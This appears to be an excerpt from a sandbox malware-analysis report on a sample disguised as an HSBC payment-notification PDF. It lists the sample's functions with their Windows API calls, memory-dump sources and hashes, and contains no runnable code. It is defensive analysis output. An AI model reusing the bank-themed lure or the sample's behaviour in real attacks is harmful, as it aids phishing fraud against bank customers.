                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 004627C0
                                                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                                                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                                                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1173514356-4108050209
                                                                                                                                                    • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                                                                                                    • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                                                                                                                                                    • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                                                                                                    • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                                                                                                                                                    Function 00458E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 365058703-1403004172
                                                                                                                                                    • Opcode ID: 3637f641140cfdbdda396ba1fc07c9340534497a38f7a01f31529e5fa44d2cc8
                                                                                                                                                    • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                                                                                                                                    • Opcode Fuzzy Hash: 3637f641140cfdbdda396ba1fc07c9340534497a38f7a01f31529e5fa44d2cc8
                                                                                                                                                    • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                                                                                                                                    Function 004863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                                                                                      • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                                                                                      • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00486468
                                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00486485
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                                                    • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                                                                                    • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                                                                                                                                    • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                                                                                    • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                                                                                                                                    Function 00466D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                                                                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                                                    • String ID: nul
                                                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                                                    • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                                                                                                    • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                                                                                                                                                    • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                                                                                                    • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                                                                                                                                    Function 00466E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                                                                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                                                    • String ID: nul
                                                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                                                    • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                                                                                    • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                                                                                                                                    • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                                                                                    • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                                                                                                                                                    Function 0046AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046ACC1
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                    • String ID: %lu
                                                                                                                                                    • API String ID: 3164766367-685833217
                                                                                                                                                    • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                                                                                                    • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                                                                                                                                                    • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                                                                                                    • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                                                                                                                                                    Function 00461142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                                                                                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                                    • String ID: @F
                                                                                                                                                    • API String ID: 2875609808-2781531706
                                                                                                                                                    • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                                                                                    • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                                                                                                                                    • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                                                                                    • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                                                                                                                                                    Function 0047EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                                                                                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0047EDEB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2364364464-0
                                                                                                                                                    • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                                                                                                    • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                                                                                                                                                    • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                                                                                                    • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                                                                                                                                                    Function 00480037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                      • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3440857362-0
                                                                                                                                                    • Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                                                                                                                    • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                                                                                                                                                    • Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                                                                                                                    • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                                                                                                                                                    Function 0046E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                                                                                                                                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1389676194-0
                                                                                                                                                    • Opcode ID: 0e7ac17a3333e4cacf626b0afedb81deac31485ce1361bd2fc21f0fc68965d4a
                                                                                                                                                    • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                                                                                                                                                    • Opcode Fuzzy Hash: 0e7ac17a3333e4cacf626b0afedb81deac31485ce1361bd2fc21f0fc68965d4a
                                                                                                                                                    • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                                                                                                                                                    Function 0048A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                                                                                                    • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                                                                                                                                                    • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                                                                                                    • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                                                                                                                                                    Function 00402344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00402357
                                                                                                                                                    • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
